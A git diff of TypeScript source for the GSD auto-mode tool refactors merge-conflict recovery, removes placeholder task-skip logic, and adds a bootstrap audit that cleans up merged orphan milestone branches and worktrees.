-      return `${relMilestoneFile(base, mid!, "RESEARCH")} (milestone research)`;
-    case "plan-milestone":
-      return `${relMilestoneFile(base, mid!, "ROADMAP")} (milestone roadmap)`;
-    case "research-slice":
-      return `${relSliceFile(base, mid!, sid!, "RESEARCH")} (slice research)`;
-    case "plan-slice":
-      return `${relSliceFile(base, mid!, sid!, "PLAN")} (slice plan)`;
-    case "execute-task": {
-      const tid = parts[2];
-      return `Task ${tid} marked [x] in ${relSliceFile(base, mid!, sid!, "PLAN")} + summary written`;
-    }
-    case "complete-slice":
-      return `Slice ${sid} marked [x] in ${relMilestoneFile(base, mid!, "ROADMAP")} + summary + UAT written`;
-    case "replan-slice":
-      return `${relSliceFile(base, mid!, sid!, "REPLAN")} + updated ${relSliceFile(base, mid!, sid!, "PLAN")}`;
-    case "rewrite-docs":
-      return "Active overrides resolved in .gsd/OVERRIDES.md + plan documents updated";
-    case "reassess-roadmap":
-      return `${relSliceFile(base, mid!, sid!, "ASSESSMENT")} (roadmap reassessment)`;
-    case "run-uat":
-      return `${relSliceFile(base, mid!, sid!, "UAT-RESULT")} (UAT result)`;
-    case "validate-milestone":
-      return `${relMilestoneFile(base, mid!, "VALIDATION")} (milestone validation report)`;
-    case "complete-milestone":
-      return `${relMilestoneFile(base, mid!, "SUMMARY")} (milestone summary)`;
-    default:
-      return null;
-  }
-}
-
-// ─── Skip / Blocker Artifact Generation ───────────────────────────────────────
-
-/**
- * Write skip artifacts for a stuck execute-task: a blocker task summary and
- * the [x] checkbox in the slice plan. Returns true if artifacts were written.
- */
-export function skipExecuteTask(
-  base: string,
-  mid: string,
-  sid: string,
-  tid: string,
-  status: { summaryExists: boolean; taskChecked: boolean },
-  reason: string,
-  maxAttempts: number,
-): boolean {
-  // Write a blocker task summary if missing.
-  if (!status.summaryExists) {
-    const tasksDir = resolveTasksDir(base, mid, sid);
-    const sDir = resolveSlicePath(base, mid, sid);
-    const targetDir = tasksDir ?? (sDir ? join(sDir, "tasks") : null);
-    if (!targetDir) return false;
-    if (!existsSync(targetDir)) mkdirSync(targetDir, { recursive: true });
-    const summaryPath = join(targetDir, buildTaskFileName(tid, "SUMMARY"));
-    const content = [
-      `# BLOCKER — task skipped by auto-mode recovery`,
-      ``,
-      `Task \`${tid}\` in slice \`${sid}\` (milestone \`${mid}\`) failed to complete after ${reason} recovery exhausted ${maxAttempts} attempts.`,
-      ``,
-      `This placeholder was written by auto-mode so the pipeline can advance.`,
-      `Review this task manually and replace this file with a real summary.`,
-    ].join("\n");
-    writeFileSync(summaryPath, content, "utf-8");
-  }
-
-  // Mark [x] in the slice plan if not already checked.
-  if (!status.taskChecked) {
-    const planAbs = resolveSliceFile(base, mid, sid, "PLAN");
-    if (planAbs && existsSync(planAbs)) {
-      const planContent = readFileSync(planAbs, "utf-8");
-      const escapedTid = tid.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
-      const re = new RegExp(`^(- \\[) \\] (\\*\\*${escapedTid}:)`, "m");
-      if (re.test(planContent)) {
-        writeFileSync(planAbs, planContent.replace(re, "$1x] $2"), "utf-8");
-      } else {
-        // Regex didn't match — checkbox format differs from expected pattern.
-        // Return false so callers know the plan was NOT updated and can
-        // fall through to other recovery strategies instead of assuming success.
-        return false;
-      }
-    }
-  }
-
-  return true;
-}
-
 // ─── Merge State Reconciliation ───────────────────────────────────────────────
 
+/**
+ * Best-effort abort of a pending merge/squash and hard-reset to HEAD.
+ * Handles both real merges (MERGE_HEAD) and squash merges (SQUASH_MSG).
+ */
+function abortAndResetMerge(
+  basePath: string,
+  hasMergeHead: boolean,
+  squashMsgPath: string,
+): void {
+  if (hasMergeHead) {
+    try {
+      nativeMergeAbort(basePath);
+    } catch (err) {
+      /* best-effort */
+      logWarning("recovery", `git merge-abort failed: ${err instanceof Error ? err.message : String(err)}`);
+    }
+  } else if (squashMsgPath) {
+    try {
+      unlinkSync(squashMsgPath);
+    } catch (err) {
+      /* best-effort */
+      logWarning("recovery", `file unlink failed: ${err instanceof Error ? err.message : String(err)}`);
+    }
+  }
+  try {
+    nativeResetHard(basePath);
+  } catch (err) {
+    /* best-effort */
+    logError("recovery", `git reset failed: ${err instanceof Error ? err.message : String(err)}`);
+  }
+}
+
+export type MergeReconcileResult = "clean" | "reconciled" | "blocked";
+
 /**
  * Detect leftover merge state from a prior session and reconcile it.
  * If MERGE_HEAD or SQUASH_MSG exists, check whether conflicts are resolved.
- * If resolved: finalize the commit. If still conflicted: abort and reset.
- *
- * Returns true if state was dirty and re-derivation is needed.
+ * If resolved: finalize the commit. If only .gsd conflicts remain: auto-resolve.
+ * If code conflicts remain: fail safe without modifying the worktree.
  */
 export function reconcileMergeState(
   basePath: string,
   ctx: ExtensionContext,
-): boolean {
+): MergeReconcileResult {
   const mergeHeadPath = join(basePath, ".git", "MERGE_HEAD");
   const squashMsgPath = join(basePath, ".git", "SQUASH_MSG");
   const hasMergeHead = existsSync(mergeHeadPath);
   const hasSquashMsg = existsSync(squashMsgPath);
-  if (!hasMergeHead && !hasSquashMsg) return false;
+  if (!hasMergeHead && !hasSquashMsg) return "clean";
 
   const conflictedFiles = nativeConflictFiles(basePath);
   if (conflictedFiles.length === 0) {
     // All conflicts resolved — finalize the merge/squash commit
     try {
-      nativeCommit(basePath, ""); // --no-edit equivalent: use empty message placeholder
-      const mode = hasMergeHead ? "merge" : "squash commit";
-      ctx.ui.notify(`Finalized leftover ${mode} from prior session.`, "info");
-    } catch {
-      // Commit may already exist; non-fatal
+      const commitSha = nativeCommit(basePath, "chore(gsd): reconcile merge state");
+      if (commitSha) {
+        const mode = hasMergeHead ? "merge" : "squash commit";
+        ctx.ui.notify(`Finalized leftover ${mode} from prior session.`, "info");
+      } else {
+        ctx.ui.notify("No new commit needed for leftover merge/squash state — already committed.", "info");
+      }
+    } catch (err) {
+      const errorMessage = getErrorMessage(err);
+      ctx.ui.notify(`Failed to finalize leftover merge/squash commit: ${errorMessage}`, "error");
+      return "blocked";
     }
   } else {
     // Still conflicted — try auto-resolving .gsd/ state file conflicts (#530)
@@ -581,7 +524,8 @@ export function reconcileMergeState(
       try {
         nativeCheckoutTheirs(basePath, gsdConflicts);
         nativeAddPaths(basePath, gsdConflicts);
-      } catch {
+      } catch (e) {
+        logError("recovery", `auto-resolve .gsd/ conflicts failed: ${(e as Error).message}`);
         resolved = false;
       }
       if (resolved) {
@@ -594,138 +538,29 @@ export function reconcileMergeState(
             `Auto-resolved ${gsdConflicts.length} .gsd/ state file conflict(s) from prior merge.`,
             "info",
           );
-        } catch {
+        } catch (e) {
+          logError("recovery", `auto-commit .gsd/ conflict resolution failed: ${(e as Error).message}`);
           resolved = false;
         }
       }
       if (!resolved) {
-        if (hasMergeHead) {
-          try {
-            nativeMergeAbort(basePath);
-          } catch {
-            /* best-effort */
-          }
-        } else if (hasSquashMsg) {
-          try {
-            unlinkSync(squashMsgPath);
-          } catch {
-            /* best-effort */
-          }
-        }
-        try {
-          nativeResetHard(basePath);
-        } catch {
-          /* best-effort */
-        }
+        abortAndResetMerge(basePath, hasMergeHead, squashMsgPath);
         ctx.ui.notify(
           "Detected leftover merge state — auto-resolve failed, cleaned up. Re-deriving state.",
           "warning",
         );
       }
     } else {
-      // Code conflicts present — abort and reset
-      if (hasMergeHead) {
-        try {
-          nativeMergeAbort(basePath);
-        } catch {
-          /* best-effort */
-        }
-      } else if (hasSquashMsg) {
-        try {
-          unlinkSync(squashMsgPath);
-        } catch {
-          /* best-effort */
-        }
-      }
-      try {
-        nativeResetHard(basePath);
-      } catch {
-        /* best-effort */
-      }
+      // Code conflicts present — fail safe and preserve any manual resolution
+      // work instead of discarding it with merge --abort/reset --hard.
       ctx.ui.notify(
-        "Detected leftover merge state with unresolved conflicts — cleaned up. Re-deriving state.",
-        "warning",
+        "Detected leftover merge state with unresolved code conflicts. Auto-mode will pause without modifying the worktree so manual conflict resolution is preserved.",
+        "error",
       );
+      return "blocked";
     }
   }
-  return true;
-}
-
-// ─── Self-Heal Runtime Records ────────────────────────────────────────────────
-
-/**
- * Self-heal: scan runtime records in .gsd/ and clear stale ones.
- * Clears dispatched records older than 1 hour (process crashed before
- * completing the unit). deriveState() handles re-derivation — no need
- * for completion key persistence here.
- */
-export async function selfHealRuntimeRecords(
-  base: string,
-  ctx: ExtensionContext,
-): Promise<void> {
-  try {
-    const { listUnitRuntimeRecords } = await import("./unit-runtime.js");
-    const records = listUnitRuntimeRecords(base);
-    let healed = 0;
-    const STALE_THRESHOLD_MS = 60 * 60 * 1000; // 1 hour
-    const now = Date.now();
-    for (const record of records) {
-      const { unitType, unitId } = record;
-
-      // Case 0: complete-slice with SUMMARY + UAT but unchecked roadmap (#1350).
-      // If a complete-slice was interrupted after writing artifacts but before
-      // flipping the roadmap checkbox, the verification fails and the dispatch
-      // loop relaunches the same unit forever. Auto-fix the checkbox.
-      if (unitType === "complete-slice") {
-        const { milestone: mid, slice: sid } = parseUnitId(unitId);
-        if (mid && sid) {
-          const dir = resolveSlicePath(base, mid, sid);
-          if (dir) {
-            const summaryPath = join(dir, buildSliceFileName(sid, "SUMMARY"));
-            const uatPath = join(dir, buildSliceFileName(sid, "UAT"));
-            if (existsSync(summaryPath) && existsSync(uatPath)) {
-              const roadmapFile = resolveMilestoneFile(base, mid, "ROADMAP");
-              if (roadmapFile && existsSync(roadmapFile)) {
-                try {
-                  const roadmapContent = readFileSync(roadmapFile, "utf-8");
-                  const roadmap = parseRoadmap(roadmapContent);
-                  const slice = (roadmap.slices ?? []).find(s => s.id === sid);
-                  if (slice && !slice.done) {
-                    // Auto-fix: flip the checkbox using shared utility
-                    if (markSliceDoneInRoadmap(base, mid, sid)) {
-                      ctx.ui.notify(
-                        `Self-heal: marked ${sid} done in roadmap (SUMMARY + UAT exist but checkbox was stale).`,
-                        "info",
-                      );
-                    }
-                  }
-                } catch {
-                  // Roadmap parse failure — don't block self-heal
-                }
-              }
-            }
-          }
-        }
-      }
-
-      // Clear stale dispatched records (dispatched > 1h ago, process crashed)
-      const age = now - (record.startedAt ?? 0);
-      if (record.phase === "dispatched" && age > STALE_THRESHOLD_MS) {
-        clearUnitRuntimeRecord(base, unitType, unitId);
-        healed++;
-        continue;
-      }
-    }
-    if (healed > 0) {
-      ctx.ui.notify(
-        `Self-heal: cleared ${healed} stale runtime record(s).`,
-        "info",
-      );
-    }
-  } catch (e) {
-    // Non-fatal — self-heal should never block auto-mode start
-    void e;
-  }
+  return "reconciled";
 }
 
 // ─── Loop Remediation ─────────────────────────────────────────────────────────
@@ -739,20 +574,14 @@ export function buildLoopRemediationSteps(
   unitId: string,
   base: string,
 ): string | null {
-  const parts = unitId.split("/");
-  const mid = parts[0];
-  const sid = parts[1];
-  const tid = parts[2];
+  const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId);
   switch (unitType) {
     case "execute-task": {
       if (!mid || !sid || !tid) break;
-      const planRel = relSliceFile(base, mid, sid, "PLAN");
-      const summaryRel = relTaskFile(base, mid, sid, tid, "SUMMARY");
       return [
-        `   1. Write ${summaryRel} (even a partial summary is sufficient to unblock the pipeline)`,
-        `   2. Mark ${tid} [x] in ${planRel}: change "- [ ] **${tid}:" → "- [x] **${tid}:"`,
-        `   3. Run \`gsd doctor\` to reconcile .gsd/ state`,
-        `   4. Resume auto-mode — it will pick up from the next task`,
+        `   1. Run \`gsd undo-task ${tid}\` to reset the task state`,
+        `   2. Resume auto-mode — it will re-execute the task`,
+        `   3. If the task keeps failing, run \`gsd recover\` to rebuild DB state from disk`,
       ].join("\n");
     }
     case "plan-slice":
@@ -764,17 +593,16 @@ export function buildLoopRemediationSteps(
           : relSliceFile(base, mid, sid, "RESEARCH");
       return [
         `   1. Write ${artifactRel} manually (or with the LLM in interactive mode)`,
-        `   2. Run \`gsd doctor\` to reconcile .gsd/ state`,
+        `   2. Run \`gsd recover\` to rebuild DB state from disk`,
         `   3. Resume auto-mode`,
       ].join("\n");
     }
     case "complete-slice": {
       if (!mid || !sid) break;
       return [
-        `   1. Write the slice summary and UAT file for ${sid} in ${relSlicePath(base, mid, sid)}`,
-        `   2. Mark ${sid} [x] in ${relMilestoneFile(base, mid, "ROADMAP")}`,
-        `   3. Run \`gsd doctor\` to reconcile .gsd/ state`,
-        `   4. Resume auto-mode`,
+        `   1. Run \`gsd reset-slice ${sid}\` to reset the slice and all its tasks`,
+        `   2. Resume auto-mode — it will re-execute incomplete tasks and re-complete the slice`,
+        `   3. If the slice keeps failing, run \`gsd recover\` to rebuild DB state from disk`,
       ].join("\n");
     }
     case "validate-milestone": {
@@ -782,7 +610,7 @@ export function buildLoopRemediationSteps(
       const artifactRel = relMilestoneFile(base, mid, "VALIDATION");
       return [
         `   1. Write ${artifactRel} with verdict: pass`,
-        `   2. Run \`gsd doctor\``,
+        `   2. Run \`gsd recover\` to rebuild DB state from disk`,
         `   3. Resume auto-mode`,
       ].join("\n");
     }
diff --git a/src/resources/extensions/gsd/auto-start.ts b/src/resources/extensions/gsd/auto-start.ts
index 7e8e79c9e..f28c7eaa9 100644
--- a/src/resources/extensions/gsd/auto-start.ts
+++ b/src/resources/extensions/gsd/auto-start.ts
@@ -38,6 +38,13 @@ import {
   nativeInit,
   nativeAddAll,
   nativeCommit,
+  nativeGetCurrentBranch,
+  nativeDetectMainBranch,
+  nativeCheckoutBranch,
+  nativeBranchList,
+  nativeBranchListMerged,
+  nativeBranchDelete,
+  nativeWorktreeRemove,
 } from "./native-git-bridge.js";
 import { GitServiceImpl } from "./git-service.js";
 import {
@@ -46,13 +53,14 @@ import {
   setActiveMilestoneId,
 } from "./worktree.js";
 import { getAutoWorktreePath, isInAutoWorktree } from "./auto-worktree.js";
-import { readResourceVersion } from "./auto-worktree-sync.js";
+import { readResourceVersion, cleanStaleRuntimeUnits } from "./auto-worktree.js";
+import { worktreePath as getWorktreeDir, isInsideWorktreesDir } from "./worktree-manager.js";
 import { initMetrics } from "./metrics.js";
 import { initRoutingHistory } from "./routing-history.js";
 import { restoreHookState, resetHookState } from "./post-unit-hooks.js";
 import { resetProactiveHealing, setLevelChangeCallback } from "./doctor-proactive.js";
 import { snapshotSkills } from "./skill-discovery.js";
-import { isDbAvailable } from "./gsd-db.js";
+import { isDbAvailable, getMilestone, openDatabase } from "./gsd-db.js";
 import { hideFooter } from "./auto-dashboard.js";
 import {
   debugLog,
@@ -60,17 +68,22 @@ import {
   isDebugEnabled,
   getDebugLogPath,
 } from "./debug-logger.js";
+import { logWarning, logError } from "./workflow-logger.js";
+import { parseUnitId } from "./unit-id.js";
 import type { AutoSession } from "./auto/session.js";
 import {
   existsSync,
   mkdirSync,
   readdirSync,
+  rmSync,
   statSync,
   unlinkSync,
 } from "node:fs";
 import { join } from "node:path";
 import { sep as pathSep } from "node:path";
 
+import { resolveProjectRootDbPath } from "./bootstrap/dynamic-tools.js";
+import { resolveDefaultSessionModel } from "./preferences-models.js";
 import type { WorktreeResolver } from "./worktree-resolver.js";
 
 export interface BootstrapDeps {
@@ -89,12 +102,138 @@ export interface BootstrapDeps {
  * concurrent session detected). Returns true when ready to dispatch.
  */
 
-/** Guard: tracks consecutive bootstrap attempts that found phase === "complete".
- *  Prevents the recursive dialog loop described in #1348 where
- *  bootstrapAutoSession → showSmartEntry → checkAutoStartAfterDiscuss → startAuto
- *  cycles indefinitely when the discuss workflow doesn't produce a milestone. */
-let _consecutiveCompleteBootstraps = 0;
+// Guard constant for consecutive bootstrap attempts that found phase === "complete".
+// Counter moved to AutoSession.consecutiveCompleteBootstraps so s.reset() clears it.
 const MAX_CONSECUTIVE_COMPLETE_BOOTSTRAPS = 2;
+
+export async function openProjectDbIfPresent(basePath: string): Promise<void> {
+  const gsdDbPath = resolveProjectRootDbPath(basePath);
+  if (!existsSync(gsdDbPath) || isDbAvailable()) return;
+
+  try {
+    openDatabase(gsdDbPath);
+  } catch (err) {
+    logWarning("engine", `gsd-db: failed to open existing database: ${err instanceof Error ? err.message : String(err)}`);
+  }
+}
+
+/**
+ * Audit for orphaned milestone branches at bootstrap.
+ *
+ * After a milestone completes, the teardown step (merge branch → main,
+ * delete branch, remove worktree) runs as a post-completion engine step.
+ * If the session ends between completion and teardown, the branch and
+ * worktree are orphaned — the DB says "complete" so auto-mode won't
+ * re-enter the milestone, and the teardown is never retried.
+ *
+ * This audit runs on every fresh bootstrap to catch that gap:
+ * 1. Lists all local `milestone/*` branches.
+ * 2. For each, checks if the milestone's DB status is "complete".
+ * 3. If the branch is already merged into main → deletes the branch
+ *    and cleans up any orphaned worktree directory (safe, no data loss).
+ * 4. If the branch is NOT merged → preserves it and warns the user
+ *    so they can merge manually (data safety first).
+ *
+ * Returns a summary of actions taken for the caller to surface via notify.
+ */
+export function auditOrphanedMilestoneBranches(
+  basePath: string,
+  isolationMode: "worktree" | "branch" | "none",
+): { recovered: string[]; warnings: string[] } {
+  const recovered: string[] = [];
+  const warnings: string[] = [];
+
+  // Skip in none mode — no milestone branches are created
+  if (isolationMode === "none") return { recovered, warnings };
+
+  // Skip if DB not available — can't determine completion status
+  if (!isDbAvailable()) return { recovered, warnings };
+
+  let milestoneBranches: string[];
+  try {
+    milestoneBranches = nativeBranchList(basePath, "milestone/*");
+  } catch {
+    // git branch list failed — skip audit
+    return { recovered, warnings };
+  }
+
+  if (milestoneBranches.length === 0) return { recovered, warnings };
+
+  // Detect main branch for merge-check
+  let mainBranch: string;
+  try {
+    mainBranch = nativeDetectMainBranch(basePath);
+  } catch {
+    mainBranch = "main";
+  }
+
+  // Get branches already merged into main
+  let mergedBranches: Set<string>;
+  try {
+    mergedBranches = new Set(nativeBranchListMerged(basePath, mainBranch, "milestone/*"));
+  } catch {
+    mergedBranches = new Set();
+  }
+
+  for (const branch of milestoneBranches) {
+    const milestoneId = branch.replace(/^milestone\//, "");
+    const milestone = getMilestone(milestoneId);
+
+    // Only audit completed milestones
+    if (!milestone || milestone.status !== "complete") continue;
+
+    const isMerged = mergedBranches.has(branch);
+
+    if (isMerged) {
+      // Branch is merged — safe to delete branch and clean up worktree dir
+      try {
+        nativeBranchDelete(basePath, branch, true);
+        recovered.push(`Deleted merged branch ${branch} for completed milestone ${milestoneId}.`);
+      } catch (err) {
+        warnings.push(`Failed to delete merged branch ${branch}: ${err instanceof Error ? err.message : String(err)}`);
+      }
+
+      // Clean up orphaned worktree directory if it exists
+      const wtDir = getWorktreeDir(basePath, milestoneId);
+      if (existsSync(wtDir)) {
+        // Try git worktree remove first (handles registered worktrees)
+        try {
+          nativeWorktreeRemove(basePath, wtDir, true);
+        } catch (e) {
+          // Not a registered worktree — expected for orphaned dirs
+          logWarning("engine", `worktree remove failed (expected for orphaned dirs): ${e instanceof Error ? e.message : String(e)}`);
+        }
+
+        // If the directory still exists after git worktree remove (either it
+        // wasn't registered or the remove was a noop), fall back to direct
+        // filesystem removal — but only inside .gsd/worktrees/ for safety (#2365).
+        if (existsSync(wtDir)) {
+          if (isInsideWorktreesDir(basePath, wtDir)) {
+            try {
+              rmSync(wtDir, { recursive: true, force: true });
+              recovered.push(`Removed orphaned worktree directory for ${milestoneId}.`);
+            } catch (err2) {
+              warnings.push(`Failed to remove worktree directory for ${milestoneId}: ${err2 instanceof Error ? err2.message : String(err2)}`);
+            }
+          } else {
+            warnings.push(`Orphaned worktree directory for ${milestoneId} is outside .gsd/worktrees/ — skipping removal for safety.`);
+          }
+        } else {
+          recovered.push(`Removed orphaned worktree directory for ${milestoneId}.`);
+        }
+      }
+    } else {
+      // Branch is NOT merged — preserve for safety, warn the user
+      warnings.push(
+        `Branch ${branch} exists for completed milestone ${milestoneId} but is NOT merged into ${mainBranch}. ` +
+        `This may contain unmerged work. Merge manually or run \`/gsd health --fix\` to resolve.`,
+      );
+    }
+  }
+
+  return { recovered, warnings };
+}
+
 export async function bootstrapAutoSession(
   s: AutoSession,
   ctx: ExtensionCommandContext,
@@ -124,6 +263,19 @@ export async function bootstrapAutoSession(
     return false;
   }
 
+  // Capture the user's session model before guided-flow dispatch can apply a
+  // phase-specific planning model for a discuss turn (#2829).
+  //
+  // GSD PREFERENCES.md takes priority over the session model from settings.json
+  // (#3517).  The session model (ctx.model) comes from findInitialModel() which
+  // reads defaultProvider/defaultModel from ~/.gsd/agent/settings.json.  When
+  // the user has explicit model preferences in PREFERENCES.md, those should win.
+  const preferredModel = resolveDefaultSessionModel(ctx.model?.provider);
+  const startModelSnapshot = preferredModel
+    ?? (ctx.model
+      ? { provider: ctx.model.provider, id: ctx.model.id }
+      : null);
+
   try {
     // Validate GSD_PROJECT_ID early so the user gets immediate feedback
     const customProjectId = process.env.GSD_PROJECT_ID;
@@ -135,13 +287,14 @@ export async function bootstrapAutoSession(
       return releaseLockAndReturn();
     }
 
-    // Ensure git repo exists.
-    // Guard against inherited repos: if `base` is a subdirectory of another
-    // git repo that has no .gsd (i.e. the parent project was never initialised
-    // with GSD), create a fresh git repo at `base` so it gets its own identity
-    // hash. Without this, repoIdentity() resolves to the parent repo's hash
-    // and loads milestones from an unrelated project (#1639).
-    if (!nativeIsRepo(base) || isInheritedRepo(base)) {
+    // Ensure git repo exists *locally* at base.
+    // nativeIsRepo() uses `git rev-parse` which traverses up to parent dirs,
+    // so a parent repo can make it return true even when base has no .git of
+    // its own. Check for a local .git instead (defense-in-depth for the case
+    // where isInheritedRepo() returns a false negative, e.g. stale .gsd at
+    // the parent git root). See #2393 and related issue.
+    const hasLocalGit = existsSync(join(base, ".git"));
+    if (!hasLocalGit || isInheritedRepo(base)) {
       const mainBranch =
         loadEffectiveGSDPreferences()?.preferences?.git?.main_branch || "main";
       nativeInit(base, mainBranch);
@@ -162,22 +315,23 @@ export async function bootstrapAutoSession(
     // ensureGitignore checks for git-tracked .gsd/ files and skips the
     // ".gsd" pattern if the project intentionally tracks .gsd/ in git.
     const gitPrefs = loadEffectiveGSDPreferences()?.preferences?.git;
-    const commitDocs = gitPrefs?.commit_docs;
     const manageGitignore = gitPrefs?.manage_gitignore;
-    ensureGitignore(base, { commitDocs, manageGitignore });
+    ensureGitignore(base, { manageGitignore });
     if (manageGitignore !== false) untrackRuntimeFiles(base);
 
-    // Bootstrap .gsd/ if it doesn't exist
+    // Bootstrap milestones/ if it doesn't exist.
+    // Check milestones/ directly — ensureGsdSymlink above already created .gsd/,
+    // so checking .gsd/ existence would be dead code (#2942).
     const gsdDir = join(base, ".gsd");
-    if (!existsSync(gsdDir)) {
-      mkdirSync(join(gsdDir, "milestones"), { recursive: true });
-      if (commitDocs !== false) {
-        try {
-          nativeAddAll(base);
-          nativeCommit(base, "chore: init gsd");
-        } catch {
-          /* nothing to commit */
-        }
+    const milestonesPath = join(gsdDir, "milestones");
+    if (!existsSync(milestonesPath)) {
+      mkdirSync(milestonesPath, { recursive: true });
+      try {
+        nativeAddAll(base);
+        nativeCommit(base, "chore: init gsd");
+      } catch (err) {
+        /* nothing to commit */
+        logWarning("engine", `mkdir failed: ${err instanceof Error ? err.message : String(err)}`);
       }
     }
 
@@ -187,7 +341,6 @@ export async function bootstrapAutoSession(
       loadEffectiveGSDPreferences()?.preferences?.git ?? {},
     );
 
-
     // ── Debug mode ──
     if (!isDebugEnabled() && process.env.GSD_DEBUG === "1") {
       enableDebug(base);
@@ -215,30 +368,33 @@ export async function bootstrapAutoSession(
     invalidateAllCaches();
 
     // Clean stale runtime unit files for completed milestones (#887)
+    cleanStaleRuntimeUnits(
+      gsdRoot(base),
+      (mid) => !!resolveMilestoneFile(base, mid, "SUMMARY"),
+    );
+
+    // Open the project-root DB before deriveState so DB-backed state
+    // derivation (queue-order, task status) works on a cold start (#2841).
+    await openProjectDbIfPresent(base);
+
+    // ── Orphaned milestone branch audit ──
+    // Catches completed milestones whose teardown (merge + branch delete)
+    // was lost due to session ending between completion and teardown.
+    // Must run after DB open and before worktree entry.
     try {
-      const runtimeUnitsDir = join(gsdRoot(base), "runtime", "units");
-      if (existsSync(runtimeUnitsDir)) {
-        for (const file of readdirSync(runtimeUnitsDir)) {
-          if (!file.endsWith(".json")) continue;
-          const midMatch = file.match(/(M\d+(?:-[a-z0-9]{6})?)/);
-          if (!midMatch) continue;
-          const mid = midMatch[1];
-          if (resolveMilestoneFile(base, mid, "SUMMARY")) {
-            try {
-              unlinkSync(join(runtimeUnitsDir, file));
-            } catch (e) {
-              debugLog("stale-unit-cleanup-failed", {
-                file,
-                error: e instanceof Error ? e.message : String(e),
-              });
-            }
-          }
-        }
+      const auditResult = auditOrphanedMilestoneBranches(base, getIsolationMode());
+      for (const msg of auditResult.recovered) {
+        ctx.ui.notify(`Orphan audit: ${msg}`, "info");
       }
-    } catch (e) {
-      debugLog("stale-unit-dir-cleanup-failed", {
-        error: e instanceof Error ? e.message : String(e),
-      });
+      for (const msg of auditResult.warnings) {
+        ctx.ui.notify(`Orphan audit: ${msg}`, "warning");
+      }
+      if (auditResult.recovered.length > 0) {
+        debugLog("orphan-audit", { recovered: auditResult.recovered, warnings: auditResult.warnings });
+      }
+    } catch (err) {
+      // Non-fatal — the audit is defensive, never block bootstrap
+      logWarning("bootstrap", `orphaned milestone branch audit failed: ${err instanceof Error ? err.message : String(err)}`);
     }
 
     let state = await deriveState(base);
@@ -255,11 +411,14 @@ export async function bootstrapAutoSession(
       }
     }
 
-    // Milestone branch recovery (#601)
+    // Milestone branch recovery (#601, #2358)
+    // Detect survivor milestone branches in both pre-planning and complete phases.
+    // In phase=complete, the milestone artifacts exist but finalization (merge,
+    // worktree cleanup) was never run — the survivor branch must be merged.
     let hasSurvivorBranch = false;
     if (
       state.activeMilestone &&
-      state.phase === "pre-planning" &&
+      (state.phase === "pre-planning" || state.phase === "complete") &&
       shouldUseWorktreeIsolation() &&
       !detectWorktreeName(base) &&
       !base.includes(`${pathSep}.gsd${pathSep}worktrees${pathSep}`)
@@ -301,15 +460,35 @@ export async function bootstrapAutoSession(
       }
     }
 
+    // Survivor branch exists and milestone is complete (#2358):
+    // The milestone artifacts were written but finalization (merge, worktree
+    // cleanup) never ran. Run mergeAndExit to finalize, then re-derive state
+    // so the normal "all milestones complete" or "next milestone" path runs.
+    if (hasSurvivorBranch && state.phase === "complete") {
+      const mid = state.activeMilestone!.id;
+      ctx.ui.notify(
+        `Milestone ${mid} is complete but branch/worktree was not finalized. Running merge now.`,
+        "info",
+      );
+      const resolver = buildResolver();
+      resolver.mergeAndExit(mid, {
+        notify: ctx.ui.notify.bind(ctx.ui),
+      });
+      invalidateAllCaches();
+      state = await deriveState(base);
+      // Clear survivor flag — finalization is done
+      hasSurvivorBranch = false;
+    }
+
     if (!hasSurvivorBranch) {
       // No active work — start a new milestone via discuss flow
       if (!state.activeMilestone || state.phase === "complete") {
         // Guard against recursive dialog loop (#1348):
         // If we've entered this branch multiple times in quick succession,
         // the discuss workflow isn't producing a milestone. Break the cycle.
-        _consecutiveCompleteBootstraps++;
-        if (_consecutiveCompleteBootstraps > MAX_CONSECUTIVE_COMPLETE_BOOTSTRAPS) {
-          _consecutiveCompleteBootstraps = 0;
+        s.consecutiveCompleteBootstraps++;
+        if (s.consecutiveCompleteBootstraps > MAX_CONSECUTIVE_COMPLETE_BOOTSTRAPS) {
+          s.consecutiveCompleteBootstraps = 0;
           ctx.ui.notify(
             "All milestones are complete and the discussion didn't produce a new one. " +
             "Run /gsd to start a new milestone manually.",
@@ -328,7 +507,7 @@ export async function bootstrapAutoSession(
           postState.phase !== "complete" &&
           postState.phase !== "pre-planning"
         ) {
-          _consecutiveCompleteBootstraps = 0; // Successfully advanced past "complete"
+          s.consecutiveCompleteBootstraps = 0; // Successfully advanced past "complete"
           state = postState;
         } else if (
           postState.activeMilestone &&
@@ -407,7 +586,7 @@ export async function bootstrapAutoSession(
     }
 
     // Successfully resolved an active milestone — reset the re-entry guard
-    _consecutiveCompleteBootstraps = 0;
+    s.consecutiveCompleteBootstraps = 0;
 
     // ── Initialize session state ──
     s.active = true;
@@ -429,7 +608,6 @@ export async function bootstrapAutoSession(
     });
     s.autoStartTime = Date.now();
     s.resourceVersionOnStart = readResourceVersion();
-    s.completedUnits = [];
     s.pendingQuickTasks = [];
     s.currentUnit = null;
     s.currentMilestoneId = state.activeMilestone?.id ?? null;
@@ -442,11 +620,27 @@ export async function bootstrapAutoSession(
     // Capture integration branch
     if (s.currentMilestoneId) {
       if (getIsolationMode() !== "none") {
-        captureIntegrationBranch(base, s.currentMilestoneId, { commitDocs });
+        captureIntegrationBranch(base, s.currentMilestoneId);
       }
       setActiveMilestoneId(base, s.currentMilestoneId);
     }
 
+    // Guard against stale milestone branch when isolation:none (#3613).
+    // A prior session with isolation:branch/worktree may have left HEAD on
+    // milestone/<MID>. Auto-checkout back to the integration branch.
+    if (getIsolationMode() === "none" && nativeIsRepo(base)) {
+      try {
+        const currentBranch = nativeGetCurrentBranch(base);
+        if (currentBranch.startsWith("milestone/")) {
+          const integrationBranch = nativeDetectMainBranch(base);
+          nativeCheckoutBranch(base, integrationBranch);
+          logWarning("bootstrap", `Returned to "${integrationBranch}" — HEAD was on stale milestone branch "${currentBranch}" (isolation: none does not use milestone branches).`);
+        }
+      } catch (err) {
+        logWarning("bootstrap", `Could not auto-checkout from stale milestone branch: ${err instanceof Error ? err.message : String(err)}`);
+      }
+    }
+
     // ── Auto-worktree setup ──
     s.originalBasePath = base;
 
@@ -485,17 +679,15 @@ export async function bootstrapAutoSession(
       const hasDecisions = existsSync(join(gsdDirPath, "DECISIONS.md"));
       const hasRequirements = existsSync(join(gsdDirPath, "REQUIREMENTS.md"));
       const hasMilestones = existsSync(join(gsdDirPath, "milestones"));
-      if (hasDecisions || hasRequirements || hasMilestones) {
-        try {
-          const { openDatabase: openDb } = await import("./gsd-db.js");
+      try {
+        const { openDatabase: openDb } = await import("./gsd-db.js");
+        openDb(gsdDbPath);
